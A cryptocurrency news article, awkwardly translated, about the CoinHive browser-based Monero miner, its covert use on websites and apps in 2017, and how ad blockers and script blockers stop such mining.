The unknown miners: how a single script changes the web

The name CoinHive has been on everyone’s lips for at least two months. This JavaScript can be integrated into all possible websites in just a few steps in order to use the computing power of the visitor’s PCs. A critical eye-catcher is not the scrapping of Monero (XMR) itself, but the fact that visitors are often not even informed about the use of their hardware. This new form of monetization opens up completely new horizons for both hackers and website operators. Is CoinHive now a curse or a blessing?

It all started in mid-September 2017. At Reddit, countless users of the file sharing site The Pirate Bay complained that it was used on some subpages of the Coinhive JavaScript Miner. The operators tried to appease: One would ideally say goodbye to any online advertising, but need enough money to operate the site, it was said in response to the in-house blog.

The CPU of the visitor’s PCs was not only hot there. The official website of footballer Cristiano Ronaldo or the legal streaming portal Showtime.com from the US broadcaster CBS have also used the scrapping software in the meantime. The ad block manufacturer Adguard expects that already three weeks after the introduction of the new technology, around 500 million people visited websites worldwide every month, where such scripts were used. For most legal providers, the scrapping software was switched off after it was announced, not for the illegal. Most frequently affected by the novel malicious software are, according to Adguard streaming sites, file sharing portals, porn sites and last but not least news magazines.

How does crypto mining work?

The idea behind it is as simple as it is ingenious. The more frequently and the longer a website is visited, the greater the yield. Coinhive retains 30% of the scrapped Monero value, the remainder goes to the operators of the sites. Monero (XMR) is used because the digital mining of Bitcoin has not been worthwhile for some time. In addition, the Cryptonight, the algorithm of Monero, is perfect for the hardware of normal laptops and desktops. The computing power of graphics types can not be claimed directly from the browser, let the makers of Coinhive say in their FAQs. That would, if at all, only by means of the programming interface WebGL. But that would be hellishly complicated to program and the mining process would be much too slow and thus unprofitable.

Web sites that invite you to linger long are particularly interesting. In addition to online games, these are mostly traditional forums, where much is discussed and read. Or pages on which TV series and movies can be consumed. According to calculations by TorrentFreak The Pirate Bay could implement only by the mining monthly up to 12,000 US dollars. Provided you build the script on all pages of the torrent indexer and set the maximum CPU load on the visitor CPU. With more than 19.32 million hits per month, that would bring a lot of money together. But the service provider Cloudflare has already responded and thrown out several pirate sites that have unknowingly claimed the hardware of their visitors. No online pirate can afford a kick-out at Cloudflare, because without the effective DDoS protection of this provider you are completely defenseless. In addition, Cloudflare obfuscates the actual location of the Web servers to protect them from access by the rights holders. But the high sales expectations lure, which is why some portals from the gray area still have their scrub scripts activated.
Cybercriminals interpret Coinhive as an invitation

What began as a good idea also attracts cybercriminals to come up with completely new revenue models. Trend Micro security researchers have already found several apps in the Google Play Store that came with this scouring software. On the side of CoinHive is explicitly advised against using this code because of the high battery load, it is still done.

Security researcher Troy Mursch from Las Vegas has recently come up with a particularly inventive twist. On the day of action of numerous online shops, Black Friday, the script was hidden in the shop extension LiveHelpNow. This e-commerce vendor live chat service is used on more than 1,500 websites, according to media sources. So also with the British producer Herring Shoes, the US boxing equipment Everlast and Micron Technology, the manufacturer of flash memory brand Crucial. The cybercriminals also took advantage of the public holiday on November 23 in the United States, hoping that most administrators would not notice the strangers many hours later. So far, it is not clear how it could happen that LiveHelpNow was abused for mining by Monero.

To name just another example of unauthorized mining, several Windows PCs were infected in the summer of 2017 with a Trojan that worked on the basis of the NSA backdoor DOUBLEPULSAR. After taking over the PCs that ran on 32- and 64-bit versions of Windows, the malware first checked whether sufficient resources were available for the calculations in the background. If the CPU was too slow, the Trojan was not installed.

And even the makers of Coinhive itself seem to reject any responsibility. Compared to the P2P blog Torrentfreak a spokesman announced, you just make the server and your own script available. The operators of Coinhive do not consider it their responsibility to check where their customers come from and whether their websites comply with the applicable law. They would not have the technical resources to do so. Apparently, some hackers have misunderstood this rather progressive attitude as an invitation.

AdBlockers complicate the new business model

Ironically, on such websites, where a lot is reported on technical topics, the proportion of users of ad blockers is extremely high. Operators of technology-heavy sites have often complained about losses of up to 60% in the past because at least half of their visitors used an adblocker. If the visitors do not see the advertisement, the payment of the banner will be canceled. The same applies to all scrub scripts, because the use of JavaScript by Adblock Plus & Co. is basically suppressed in order to reduce the annoying advertising to zero. Giorgio Maone’s NoScript plug-in focuses on surfer safety. But also NoScript blocks the mining completely. If you want to be in control yourself, the browser Google Chrome includes both a Miner Detector and several Crypto Miner Blockers. Several blockers are also available for Mozilla’s Firefox.

Conclusion

Similar to a knife, the miner is a double-edged sword. You can do both good and bad with it. For the maintenance of larger blogs or forums, this new form of community support may play a role in the future. You do not have to exaggerate it like Cristiano Ronaldo and put the CPU load on the maximum, less does it. And since the release of several WordPress plug-ins at the latest, every webmaster can participate in the mining process even without any programming knowledge. As long as the visitors are informed about this step and can turn it off, there is basically nothing wrong with it.

TheBitcoinNews.com – leading Bitcoin News source since 2012